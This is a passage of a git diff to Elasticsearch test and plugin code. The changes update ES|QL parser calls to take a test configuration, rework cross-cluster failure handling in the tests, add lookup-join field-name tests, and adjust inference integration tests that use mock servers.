EsqlParser().createStatement(query))); + return logicalOptimizer.optimize(analyzer.analyze(new EsqlParser().createStatement(query, EsqlTestUtils.TEST_CFG))); } @Override diff --git 
a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/plugin/DataNodeRequestSerializationTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/plugin/DataNodeRequestSerializationTests.java index 1fc481711df97..fe0e028db4c9c 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/plugin/DataNodeRequestSerializationTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/plugin/DataNodeRequestSerializationTests.java @@ -302,7 +302,7 @@ static LogicalPlan parse(String query) { ), TEST_VERIFIER ); - return logicalOptimizer.optimize(analyzer.analyze(new EsqlParser().createStatement(query))); + return logicalOptimizer.optimize(analyzer.analyze(new EsqlParser().createStatement(query, EsqlTestUtils.TEST_CFG))); } static PhysicalPlan mapAndMaybeOptimize(LogicalPlan logicalPlan) { diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/session/EsqlCCSUtilsTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/session/EsqlCCSUtilsTests.java index 2d488d7e41ee8..e2338a12f6179 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/session/EsqlCCSUtilsTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/session/EsqlCCSUtilsTests.java @@ -152,7 +152,7 @@ public void testUpdateExecutionInfoWithUnavailableClusters() { executionInfo.swapCluster(REMOTE2_ALIAS, (k, v) -> new EsqlExecutionInfo.Cluster(REMOTE2_ALIAS, "mylogs1,mylogs2,logs*", true)); var failure = new FieldCapabilitiesFailure(new String[] { "logs-a" }, new NoSeedNodeLeftException("unable to connect")); - var unvailableClusters = Map.of(REMOTE1_ALIAS, failure, REMOTE2_ALIAS, failure); + var unvailableClusters = Map.of(REMOTE1_ALIAS, List.of(failure), REMOTE2_ALIAS, List.of(failure)); EsqlCCSUtils.updateExecutionInfoWithUnavailableClusters(executionInfo, unvailableClusters); assertThat(executionInfo.clusterAliases(), equalTo(Set.of(LOCAL_CLUSTER_ALIAS, REMOTE1_ALIAS, REMOTE2_ALIAS))); @@ -184,7 +184,7 @@ public void testUpdateExecutionInfoWithUnavailableClusters() { var failure = new FieldCapabilitiesFailure(new String[] { "logs-a" }, new NoSeedNodeLeftException("unable to connect")); RemoteTransportException e = expectThrows( RemoteTransportException.class, - () -> EsqlCCSUtils.updateExecutionInfoWithUnavailableClusters(executionInfo, Map.of(REMOTE2_ALIAS, failure)) + () -> EsqlCCSUtils.updateExecutionInfoWithUnavailableClusters(executionInfo, Map.of(REMOTE2_ALIAS, List.of(failure))) ); assertThat(e.status().getStatus(), equalTo(500)); assertThat( @@ -253,7 +253,7 @@ public void testUpdateExecutionInfoWithClustersWithNoMatchingIndices() { ) ); - IndexResolution indexResolution = IndexResolution.valid(esIndex, esIndex.concreteIndices(), Set.of(), Map.of()); + IndexResolution indexResolution = IndexResolution.valid(esIndex, esIndex.concreteIndices(), Map.of()); EsqlCCSUtils.updateExecutionInfoWithClustersWithNoMatchingIndices(executionInfo, indexResolution); @@ -296,8 +296,7 @@ public void testUpdateExecutionInfoWithClustersWithNoMatchingIndices() { IndexMode.STANDARD ) ); - Map unavailableClusters = Map.of(); - IndexResolution indexResolution = IndexResolution.valid(esIndex, esIndex.concreteIndices(), Set.of(), unavailableClusters); + IndexResolution indexResolution = IndexResolution.valid(esIndex, esIndex.concreteIndices(), Map.of()); EsqlCCSUtils.updateExecutionInfoWithClustersWithNoMatchingIndices(executionInfo, indexResolution); @@ -338,8 +337,8 @@ public void 
testUpdateExecutionInfoWithClustersWithNoMatchingIndices() { ); // remote1 is unavailable var failure = new FieldCapabilitiesFailure(new String[] { "logs-a" }, new NoSeedNodeLeftException("unable to connect")); - Map<String, FieldCapabilitiesFailure> unavailableClusters = Map.of(REMOTE1_ALIAS, failure); - IndexResolution indexResolution = IndexResolution.valid(esIndex, esIndex.concreteIndices(), Set.of(), unavailableClusters); + var failures = Map.of(REMOTE1_ALIAS, List.of(failure)); + IndexResolution indexResolution = IndexResolution.valid(esIndex, esIndex.concreteIndices(), failures); EsqlCCSUtils.updateExecutionInfoWithClustersWithNoMatchingIndices(executionInfo, indexResolution); @@ -349,9 +348,8 @@ public void testUpdateExecutionInfoWithClustersWithNoMatchingIndices() { EsqlExecutionInfo.Cluster remote1Cluster = executionInfo.getCluster(REMOTE1_ALIAS); assertThat(remote1Cluster.getIndexExpression(), equalTo("*")); - // since remote1 is in the unavailable Map (passed to IndexResolution.valid), it's status will not be changed - // by updateExecutionInfoWithClustersWithNoMatchingIndices (it is handled in updateExecutionInfoWithUnavailableClusters) - assertThat(remote1Cluster.getStatus(), equalTo(EsqlExecutionInfo.Cluster.Status.RUNNING)); + // since remote1 is in the failures Map (passed to IndexResolution.valid), its status is set to SKIPPED + assertThat(remote1Cluster.getStatus(), equalTo(EsqlExecutionInfo.Cluster.Status.SKIPPED)); EsqlExecutionInfo.Cluster remote2Cluster = executionInfo.getCluster(REMOTE2_ALIAS); assertThat(remote2Cluster.getIndexExpression(), equalTo("mylogs1*,mylogs2*,logs*")); @@ -381,8 +379,8 @@ public void testUpdateExecutionInfoWithClustersWithNoMatchingIndices() { ); var failure = new FieldCapabilitiesFailure(new String[] { "logs-a" }, new NoSeedNodeLeftException("unable to connect")); - Map<String, FieldCapabilitiesFailure> unavailableClusters = Map.of(REMOTE1_ALIAS, failure); - IndexResolution indexResolution = IndexResolution.valid(esIndex, esIndex.concreteIndices(), Set.of(), unavailableClusters); + var failures = Map.of(REMOTE1_ALIAS, List.of(failure)); + IndexResolution indexResolution = IndexResolution.valid(esIndex, esIndex.concreteIndices(), failures); EsqlCCSUtils.updateExecutionInfoWithClustersWithNoMatchingIndices(executionInfo, indexResolution); EsqlExecutionInfo.Cluster localCluster = executionInfo.getCluster(LOCAL_CLUSTER_ALIAS); @@ -390,9 +388,8 @@ public void testUpdateExecutionInfoWithClustersWithNoMatchingIndices() { assertClusterStatusAndShardCounts(localCluster, EsqlExecutionInfo.Cluster.Status.RUNNING); EsqlExecutionInfo.Cluster remote1Cluster = executionInfo.getCluster(REMOTE1_ALIAS); - // since remote1 is in the unavailable Map (passed to IndexResolution.valid), it's status will not be changed - // by updateExecutionInfoWithClustersWithNoMatchingIndices (it is handled in updateExecutionInfoWithUnavailableClusters) - assertThat(remote1Cluster.getStatus(), equalTo(EsqlExecutionInfo.Cluster.Status.RUNNING)); + // skipped since remote1 is in the failures Map + assertThat(remote1Cluster.getStatus(), equalTo(EsqlExecutionInfo.Cluster.Status.SKIPPED)); EsqlExecutionInfo.Cluster remote2Cluster = executionInfo.getCluster(REMOTE2_ALIAS); assertThat(remote2Cluster.getStatus(), equalTo(EsqlExecutionInfo.Cluster.Status.SKIPPED)); @@ -430,8 +427,8 @@ public void testUpdateExecutionInfoWithClustersWithNoMatchingIndices() { // remote1 is unavailable var failure = new FieldCapabilitiesFailure(new String[] { "logs-a" }, new NoSeedNodeLeftException("unable to connect")); - Map<String, FieldCapabilitiesFailure> unavailableClusters = Map.of(REMOTE1_ALIAS, failure); - IndexResolution
indexResolution = IndexResolution.valid(esIndex, esIndex.concreteIndices(), Set.of(), unavailableClusters); + var failures = Map.of(REMOTE1_ALIAS, List.of(failure)); + IndexResolution indexResolution = IndexResolution.valid(esIndex, esIndex.concreteIndices(), failures); EsqlCCSUtils.updateExecutionInfoWithClustersWithNoMatchingIndices(executionInfo, indexResolution); @@ -441,9 +438,8 @@ public void testUpdateExecutionInfoWithClustersWithNoMatchingIndices() { EsqlExecutionInfo.Cluster remote1Cluster = executionInfo.getCluster(REMOTE1_ALIAS); assertThat(remote1Cluster.getIndexExpression(), equalTo("*")); - // since remote1 is in the unavailable Map (passed to IndexResolution.valid), it's status will not be changed - // by updateExecutionInfoWithClustersWithNoMatchingIndices (it is handled in updateExecutionInfoWithUnavailableClusters) - assertThat(remote1Cluster.getStatus(), equalTo(EsqlExecutionInfo.Cluster.Status.RUNNING)); + // skipped since remote1 is in the failures Map + assertThat(remote1Cluster.getStatus(), equalTo(EsqlExecutionInfo.Cluster.Status.SKIPPED)); EsqlExecutionInfo.Cluster remote2Cluster = executionInfo.getCluster(REMOTE2_ALIAS); assertThat(remote2Cluster.getIndexExpression(), equalTo("mylogs1*,mylogs2*,logs*")); @@ -463,7 +459,9 @@ public void testDetermineUnavailableRemoteClusters() { ) ); - Map unavailableClusters = EsqlCCSUtils.determineUnavailableRemoteClusters(failures); + Map unavailableClusters = EsqlCCSUtils.determineUnavailableRemoteClusters( + EsqlCCSUtils.groupFailuresPerCluster(failures) + ); assertThat(unavailableClusters.keySet(), equalTo(Set.of("remote1", "remote2"))); } @@ -473,7 +471,8 @@ public void testDetermineUnavailableRemoteClusters() { failures.add(new FieldCapabilitiesFailure(new String[] { "remote2:mylogs1" }, new NoSuchRemoteClusterException("remote2"))); failures.add(new FieldCapabilitiesFailure(new String[] { "remote2:mylogs1" }, new NoSeedNodeLeftException("no seed node"))); - Map unavailableClusters = EsqlCCSUtils.determineUnavailableRemoteClusters(failures); + var groupedFailures = EsqlCCSUtils.groupFailuresPerCluster(failures); + Map unavailableClusters = EsqlCCSUtils.determineUnavailableRemoteClusters(groupedFailures); assertThat(unavailableClusters.keySet(), equalTo(Set.of("remote2"))); } @@ -487,7 +486,8 @@ public void testDetermineUnavailableRemoteClusters() { new IllegalStateException("Unable to open any connections") ) ); - Map unavailableClusters = EsqlCCSUtils.determineUnavailableRemoteClusters(failures); + var groupedFailures = EsqlCCSUtils.groupFailuresPerCluster(failures); + Map unavailableClusters = EsqlCCSUtils.determineUnavailableRemoteClusters(groupedFailures); assertThat(unavailableClusters.keySet(), equalTo(Set.of("remote2"))); } @@ -495,14 +495,16 @@ public void testDetermineUnavailableRemoteClusters() { { List failures = new ArrayList<>(); failures.add(new FieldCapabilitiesFailure(new String[] { "remote1:mylogs1" }, new RuntimeException("foo"))); - Map unavailableClusters = EsqlCCSUtils.determineUnavailableRemoteClusters(failures); + var groupedFailures = EsqlCCSUtils.groupFailuresPerCluster(failures); + Map unavailableClusters = EsqlCCSUtils.determineUnavailableRemoteClusters(groupedFailures); assertThat(unavailableClusters.keySet(), equalTo(Set.of())); } // empty failures list { List failures = new ArrayList<>(); - Map unavailableClusters = EsqlCCSUtils.determineUnavailableRemoteClusters(failures); + var groupedFailures = EsqlCCSUtils.groupFailuresPerCluster(failures); + Map unavailableClusters = 
EsqlCCSUtils.determineUnavailableRemoteClusters(groupedFailures); assertThat(unavailableClusters.keySet(), equalTo(Set.of())); } } diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/session/IndexResolverFieldNamesTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/session/IndexResolverFieldNamesTests.java index 4264fdacc5d7b..619f94dba4914 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/session/IndexResolverFieldNamesTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/session/IndexResolverFieldNamesTests.java @@ -9,6 +9,7 @@ import org.elasticsearch.Build; import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.xpack.esql.EsqlTestUtils; import org.elasticsearch.xpack.esql.action.EsqlCapabilities; import org.elasticsearch.xpack.esql.parser.EsqlParser; import org.elasticsearch.xpack.esql.parser.ParsingException; @@ -1600,7 +1601,7 @@ public void testEnrichOnDefaultField() { public void testMetrics() { var query = "TS k8s | STATS bytes=sum(rate(network.total_bytes_in)), sum(rate(network.total_cost)) BY cluster"; if (Build.current().isSnapshot() == false) { - var e = expectThrows(ParsingException.class, () -> parser.createStatement(query)); + var e = expectThrows(ParsingException.class, () -> parser.createStatement(query, EsqlTestUtils.TEST_CFG)); assertThat(e.getMessage(), containsString("line 1:1: mismatched input 'TS' expecting {")); return; } @@ -1969,7 +1970,7 @@ public void testDropAgainWithWildcardAfterEval() { """, Set.of("emp_no", "emp_no.*", "*name", "*name.*")); } - public void testDropWildcardedFields_AfterRename() { + public void testDropWildcardFieldsAfterRename() { assertFieldNames( """ from employees @@ -1982,7 +1983,30 @@ public void testDropWildcardedFields_AfterRename() { ); } - public void testDropWildcardFields_WithLookupJoin() { + public void testDropWildcardFieldsAfterLookupJoins() { + assumeTrue("LOOKUP JOIN available as snapshot only", EsqlCapabilities.Cap.JOIN_LOOKUP_V12.isEnabled()); + assertFieldNames(""" + FROM sample_data + | EVAL client_ip = client_ip::keyword + | LOOKUP JOIN clientips_lookup ON client_ip + | LOOKUP JOIN message_types_lookup ON message + | SORT @timestamp + | DROP *e""", Set.of("*"), Set.of()); + } + + public void testDropWildcardFieldsAfterLookupJoins2() { + assumeTrue("LOOKUP JOIN available as snapshot only", EsqlCapabilities.Cap.JOIN_LOOKUP_V12.isEnabled()); + assertFieldNames(""" + FROM sample_data + | EVAL client_ip = client_ip::keyword + | LOOKUP JOIN clientips_lookup ON client_ip + | DROP *e, client_ip + | LOOKUP JOIN message_types_lookup ON message + | SORT @timestamp + | DROP *e""", Set.of("*"), Set.of()); + } + + public void testDropWildcardFieldsAfterLookupJoinsAndKeep() { assumeTrue("LOOKUP JOIN available as snapshot only", EsqlCapabilities.Cap.JOIN_LOOKUP_V12.isEnabled()); assertFieldNames( """ @@ -1998,6 +2022,55 @@ public void testDropWildcardFields_WithLookupJoin() { ); } + public void testDropWildcardFieldsAfterLookupJoinKeepLookupJoin() { + assumeTrue("LOOKUP JOIN available as snapshot only", EsqlCapabilities.Cap.JOIN_LOOKUP_V12.isEnabled()); + assertFieldNames( + """ + FROM sample_data + | EVAL client_ip = client_ip::keyword + | LOOKUP JOIN clientips_lookup ON client_ip + | KEEP @timestamp, *e*, client_ip + | LOOKUP JOIN message_types_lookup ON message + | SORT @timestamp + | DROP *e""", + Set.of("client_ip", "client_ip.*", "message", "message.*", "@timestamp", "@timestamp.*", "*e*", "*e", "*e.*"), + 
Set.of("message_types_lookup") + ); + } + + public void testDropWildcardFieldsAfterKeepAndLookupJoins() { + assumeTrue("LOOKUP JOIN available as snapshot only", EsqlCapabilities.Cap.JOIN_LOOKUP_V12.isEnabled()); + assertFieldNames( + """ + FROM sample_data + | EVAL client_ip = client_ip::keyword + | KEEP @timestamp, *e*, client_ip + | LOOKUP JOIN clientips_lookup ON client_ip + | LOOKUP JOIN message_types_lookup ON message + | SORT @timestamp + | DROP *e""", + Set.of("client_ip", "client_ip.*", "message", "message.*", "@timestamp", "@timestamp.*", "*e*", "*e", "*e.*"), + Set.of("clientips_lookup", "message_types_lookup") + ); + } + + public void testDropWildcardFieldsAfterKeepAndLookupJoins2() { + assumeTrue("LOOKUP JOIN available as snapshot only", EsqlCapabilities.Cap.JOIN_LOOKUP_V12.isEnabled()); + assertFieldNames( + """ + FROM sample_data + | EVAL client_ip = client_ip::keyword + | KEEP @timestamp, *e*, client_ip + | LOOKUP JOIN clientips_lookup ON client_ip + | DROP *e + | LOOKUP JOIN message_types_lookup ON message + | SORT @timestamp + | DROP *e, client_ip""", + Set.of("client_ip", "client_ip.*", "message", "message.*", "@timestamp", "@timestamp.*", "*e*", "*e", "*e.*"), + Set.of("clientips_lookup", "message_types_lookup") + ); + } + public void testForkFieldsWithKeepAfterFork() { assertFieldNames(""" FROM test @@ -2076,7 +2149,8 @@ public void testForkWithStatsAndWhere() { private Set fieldNames(String query, Set enrichPolicyMatchFields) { var preAnalysisResult = new EsqlSession.PreAnalysisResult(null); - return EsqlSession.fieldNames(parser.createStatement(query), enrichPolicyMatchFields, preAnalysisResult).fieldNames(); + return EsqlSession.fieldNames(parser.createStatement(query, EsqlTestUtils.TEST_CFG), enrichPolicyMatchFields, preAnalysisResult) + .fieldNames(); } private void assertFieldNames(String query, Set expected) { @@ -2085,7 +2159,11 @@ private void assertFieldNames(String query, Set expected) { } private void assertFieldNames(String query, Set expected, Set wildCardIndices) { - var preAnalysisResult = EsqlSession.fieldNames(parser.createStatement(query), Set.of(), new EsqlSession.PreAnalysisResult(null)); + var preAnalysisResult = EsqlSession.fieldNames( + parser.createStatement(query, EsqlTestUtils.TEST_CFG), + Set.of(), + new EsqlSession.PreAnalysisResult(null) + ); assertThat("Query-wide field names", preAnalysisResult.fieldNames(), equalTo(expected)); assertThat("Lookup Indices that expect wildcard lookups", preAnalysisResult.wildcardJoinIndices(), equalTo(wildCardIndices)); } diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/telemetry/VerifierMetricsTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/telemetry/VerifierMetricsTests.java index 0fee82f4f6ee7..1f3047262c94d 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/telemetry/VerifierMetricsTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/telemetry/VerifierMetricsTests.java @@ -10,6 +10,7 @@ import org.elasticsearch.license.XPackLicenseState; import org.elasticsearch.test.ESTestCase; import org.elasticsearch.xpack.core.watcher.common.stats.Counters; +import org.elasticsearch.xpack.esql.EsqlTestUtils; import org.elasticsearch.xpack.esql.analysis.Verifier; import org.elasticsearch.xpack.esql.expression.function.EsqlFunctionRegistry; import org.elasticsearch.xpack.esql.expression.function.FunctionDefinition; @@ -554,7 +555,7 @@ private Counters esql(String esql, Verifier v) { metrics = new Metrics(new 
EsqlFunctionRegistry()); verifier = new Verifier(metrics, new XPackLicenseState(() -> 0L)); } - analyzer(verifier).analyze(parser.createStatement(esql)); + analyzer(verifier).analyze(parser.createStatement(esql, EsqlTestUtils.TEST_CFG)); return metrics == null ? null : metrics.stats(); } diff --git a/x-pack/plugin/identity-provider/src/test/java/org/elasticsearch/xpack/idp/action/SamlInitiateSingleSignOnRequestTests.java b/x-pack/plugin/identity-provider/src/test/java/org/elasticsearch/xpack/idp/action/SamlInitiateSingleSignOnRequestTests.java index ee13dd28db4d2..6c280a2bd2a52 100644 --- a/x-pack/plugin/identity-provider/src/test/java/org/elasticsearch/xpack/idp/action/SamlInitiateSingleSignOnRequestTests.java +++ b/x-pack/plugin/identity-provider/src/test/java/org/elasticsearch/xpack/idp/action/SamlInitiateSingleSignOnRequestTests.java @@ -112,7 +112,7 @@ public void testSerializationOldTransportVersion() throws Exception { out.setTransportVersion( TransportVersionUtils.randomVersionBetween( random(), - TransportVersions.MINIMUM_COMPATIBLE, + TransportVersion.minimumCompatible(), TransportVersionUtils.getPreviousVersion(TransportVersions.IDP_CUSTOM_SAML_ATTRIBUTES_ADDED_8_19) ) ); diff --git a/x-pack/plugin/ilm/src/main/java/org/elasticsearch/xpack/ilm/action/TransportRetryAction.java b/x-pack/plugin/ilm/src/main/java/org/elasticsearch/xpack/ilm/action/TransportRetryAction.java index 5c3200c873877..2583a80a3cfb6 100644 --- a/x-pack/plugin/ilm/src/main/java/org/elasticsearch/xpack/ilm/action/TransportRetryAction.java +++ b/x-pack/plugin/ilm/src/main/java/org/elasticsearch/xpack/ilm/action/TransportRetryAction.java @@ -80,7 +80,7 @@ protected void masterOperation( submitUnbatchedTask("ilm-re-run", new AckedClusterStateUpdateTask(request, listener) { @Override public ClusterState execute(ClusterState currentState) { - final var project = state.metadata().getProject(projectState.projectId()); + final var project = currentState.metadata().getProject(projectState.projectId()); final var updatedProject = indexLifecycleService.moveIndicesToPreviouslyFailedStep(project, request.indices()); return ClusterState.builder(currentState).putProjectMetadata(updatedProject).build(); } diff --git a/x-pack/plugin/ilm/src/test/java/org/elasticsearch/xpack/ilm/IndexLifecycleRunnerTests.java b/x-pack/plugin/ilm/src/test/java/org/elasticsearch/xpack/ilm/IndexLifecycleRunnerTests.java index 2db166a91cbbe..13c001ce4e499 100644 --- a/x-pack/plugin/ilm/src/test/java/org/elasticsearch/xpack/ilm/IndexLifecycleRunnerTests.java +++ b/x-pack/plugin/ilm/src/test/java/org/elasticsearch/xpack/ilm/IndexLifecycleRunnerTests.java @@ -488,7 +488,6 @@ public void doTestRunPolicyWithFailureToReadPolicy(boolean asyncAction, boolean // The cluster state can take a few extra milliseconds to update after the steps are executed ClusterServiceUtils.awaitClusterState( - logger, s -> s.metadata().getProject(state.projectId()).index(indexMetadata.getIndex()).getLifecycleExecutionState().stepInfo() != null, clusterService ); diff --git a/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/CreateFromDeploymentIT.java b/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/CreateFromDeploymentIT.java index 5571729626fb9..3882aa5426e38 100644 --- a/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/CreateFromDeploymentIT.java +++ 
b/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/CreateFromDeploymentIT.java @@ -51,7 +51,7 @@ public void testAttachToDeployment() throws IOException { var results = infer(inferenceId, List.of("washing machine")); assertNotNull(results.get("sparse_embedding")); - var updatedNumAllocations = randomIntBetween(1, 10); + var updatedNumAllocations = randomIntBetween(1, 2); var updatedEndpointConfig = updateEndpoint(inferenceId, updatedEndpointConfig(updatedNumAllocations), TaskType.SPARSE_EMBEDDING); assertThat( updatedEndpointConfig.get("service_settings"), @@ -128,7 +128,7 @@ public void testAttachWithModelId() throws IOException { var results = infer(inferenceId, List.of("washing machine")); assertNotNull(results.get("sparse_embedding")); - var updatedNumAllocations = randomIntBetween(1, 10); + var updatedNumAllocations = randomIntBetween(1, 2); var updatedEndpointConfig = updateEndpoint(inferenceId, updatedEndpointConfig(updatedNumAllocations), TaskType.SPARSE_EMBEDDING); assertThat( updatedEndpointConfig.get("service_settings"), diff --git a/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/InferenceGetModelsWithElasticInferenceServiceIT.java b/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/InferenceGetModelsWithElasticInferenceServiceIT.java index e548fcc4f2eb1..e9ba9923fdcf8 100644 --- a/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/InferenceGetModelsWithElasticInferenceServiceIT.java +++ b/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/InferenceGetModelsWithElasticInferenceServiceIT.java @@ -41,7 +41,7 @@ public void testGetDefaultEndpoints() throws IOException { } assertInferenceIdTaskType(allModels, ".rainbow-sprinkles-elastic", TaskType.CHAT_COMPLETION); - assertInferenceIdTaskType(allModels, ".elser-v2-elastic", TaskType.SPARSE_EMBEDDING); + assertInferenceIdTaskType(allModels, ".elser-2-elastic", TaskType.SPARSE_EMBEDDING); assertInferenceIdTaskType(allModels, ".multilingual-embed-v1-elastic", TaskType.TEXT_EMBEDDING); assertInferenceIdTaskType(allModels, ".rerank-v1-elastic", TaskType.RERANK); } diff --git a/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/InferenceGetServicesIT.java b/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/InferenceGetServicesIT.java index b96c94db438a7..9bea31fcdcec2 100644 --- a/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/InferenceGetServicesIT.java +++ b/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/InferenceGetServicesIT.java @@ -20,7 +20,6 @@ import static org.elasticsearch.xpack.inference.InferenceBaseRestTest.assertStatusOkOrCreated; import static org.hamcrest.Matchers.containsInAnyOrder; -import static org.hamcrest.Matchers.equalTo; public class InferenceGetServicesIT extends BaseMockEISAuthServerTest { @@ -41,7 +40,6 @@ public void testGetServicesWithoutTaskType() throws IOException { "azureaistudio", "azureopenai", "cohere", - "custom", "deepseek", "elastic", "elasticsearch", @@ -77,9 +75,6 @@ private Iterable providers(List services) { } public void testGetServicesWithTextEmbeddingTaskType() throws IOException { - 
List services = getServices(TaskType.TEXT_EMBEDDING); - assertThat(services.size(), equalTo(18)); - assertThat( providersFor(TaskType.TEXT_EMBEDDING), containsInAnyOrder( @@ -90,7 +85,6 @@ public void testGetServicesWithTextEmbeddingTaskType() throws IOException { "azureaistudio", "azureopenai", "cohere", - "custom", "elastic", "elasticsearch", "googleaistudio", @@ -118,7 +112,6 @@ public void testGetServicesWithRerankTaskType() throws IOException { List.of( "alibabacloud-ai-search", "cohere", - "custom", "elasticsearch", "googlevertexai", "jinaai", @@ -143,7 +136,6 @@ public void testGetServicesWithCompletionTaskType() throws IOException { "azureaistudio", "azureopenai", "cohere", - "custom", "deepseek", "googleaistudio", "openai", @@ -181,7 +173,6 @@ public void testGetServicesWithSparseEmbeddingTaskType() throws IOException { containsInAnyOrder( List.of( "alibabacloud-ai-search", - "custom", "elastic", "elasticsearch", "hugging_face", diff --git a/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/MockElasticInferenceServiceAuthorizationServer.java b/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/MockElasticInferenceServiceAuthorizationServer.java index 7f0212167f8ac..4f6260dba7152 100644 --- a/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/MockElasticInferenceServiceAuthorizationServer.java +++ b/x-pack/plugin/inference/qa/inference-service-tests/src/javaRestTest/java/org/elasticsearch/xpack/inference/MockElasticInferenceServiceAuthorizationServer.java @@ -39,7 +39,7 @@ public void enqueueAuthorizeAllModelsResponse() { "task_types": ["chat"] }, { - "model_name": "elser-v2", + "model_name": "elser_model_2", "task_types": ["embed/text/sparse"] }, { diff --git a/x-pack/plugin/inference/qa/rolling-upgrade/src/javaRestTest/java/org/elasticsearch/xpack/application/CohereServiceUpgradeIT.java b/x-pack/plugin/inference/qa/rolling-upgrade/src/javaRestTest/java/org/elasticsearch/xpack/application/CohereServiceUpgradeIT.java index 9782d4881ac61..6191e83a7dca1 100644 --- a/x-pack/plugin/inference/qa/rolling-upgrade/src/javaRestTest/java/org/elasticsearch/xpack/application/CohereServiceUpgradeIT.java +++ b/x-pack/plugin/inference/qa/rolling-upgrade/src/javaRestTest/java/org/elasticsearch/xpack/application/CohereServiceUpgradeIT.java @@ -39,10 +39,12 @@ public class CohereServiceUpgradeIT extends InferenceUpgradeTestCase { // TODO: replace with proper test features private static final String COHERE_EMBEDDINGS_ADDED_TEST_FEATURE = "gte_v8.13.0"; private static final String COHERE_RERANK_ADDED_TEST_FEATURE = "gte_v8.14.0"; + private static final String COHERE_COMPLETIONS_ADDED_TEST_FEATURE = "gte_v8.15.0"; private static final String COHERE_V2_API_ADDED_TEST_FEATURE = "inference.cohere.v2"; private static MockWebServer cohereEmbeddingsServer; private static MockWebServer cohereRerankServer; + private static MockWebServer cohereCompletionsServer; private enum ApiVersion { V1, @@ -60,12 +62,16 @@ public static void startWebServer() throws IOException { cohereRerankServer = new MockWebServer(); cohereRerankServer.start(); + + cohereCompletionsServer = new MockWebServer(); + cohereCompletionsServer.start(); } @AfterClass public static void shutdown() { cohereEmbeddingsServer.close(); cohereRerankServer.close(); + cohereCompletionsServer.close(); } @SuppressWarnings("unchecked") @@ -326,6 +332,80 @@ private void assertRerank(String 
inferenceId) throws IOException { assertThat(inferenceMap.entrySet(), not(empty())); } + @SuppressWarnings("unchecked") + public void testCohereCompletions() throws IOException { + var completionsSupported = oldClusterHasFeature(COHERE_COMPLETIONS_ADDED_TEST_FEATURE); + assumeTrue("Cohere completions not supported", completionsSupported); + + ApiVersion oldClusterApiVersion = oldClusterHasFeature(COHERE_V2_API_ADDED_TEST_FEATURE) ? ApiVersion.V2 : ApiVersion.V1; + + final String oldClusterId = "old-cluster-completions"; + + if (isOldCluster()) { + // queue a response as PUT will call the service + cohereCompletionsServer.enqueue(new MockResponse().setResponseCode(200).setBody(completionsResponse(oldClusterApiVersion))); + put(oldClusterId, completionsConfig(getUrl(cohereCompletionsServer)), TaskType.COMPLETION); + + var configs = (List<Map<String, Object>>) get(TaskType.COMPLETION, oldClusterId).get("endpoints"); + assertThat(configs, hasSize(1)); + assertEquals("cohere", configs.get(0).get("service")); + var serviceSettings = (Map<String, Object>) configs.get(0).get("service_settings"); + assertThat(serviceSettings, hasEntry("model_id", "command")); + } else if (isMixedCluster()) { + var configs = (List<Map<String, Object>>) get(TaskType.COMPLETION, oldClusterId).get("endpoints"); + assertThat(configs, hasSize(1)); + assertEquals("cohere", configs.get(0).get("service")); + var serviceSettings = (Map<String, Object>) configs.get(0).get("service_settings"); + assertThat(serviceSettings, hasEntry("model_id", "command")); + } else if (isUpgradedCluster()) { + // check old cluster model + var configs = (List<Map<String, Object>>) get(TaskType.COMPLETION, oldClusterId).get("endpoints"); + var serviceSettings = (Map<String, Object>) configs.get(0).get("service_settings"); + assertThat(serviceSettings, hasEntry("model_id", "command")); + + final String newClusterId = "new-cluster-completions"; + { + cohereCompletionsServer.enqueue(new MockResponse().setResponseCode(200).setBody(completionsResponse(oldClusterApiVersion))); + var inferenceMap = inference(oldClusterId, TaskType.COMPLETION, "some text"); + assertThat(inferenceMap.entrySet(), not(empty())); + assertVersionInPath(cohereCompletionsServer.requests().getLast(), "chat", oldClusterApiVersion); + } + { + // new cluster uses the V2 API + cohereCompletionsServer.enqueue(new MockResponse().setResponseCode(200).setBody(completionsResponse(ApiVersion.V2))); + put(newClusterId, 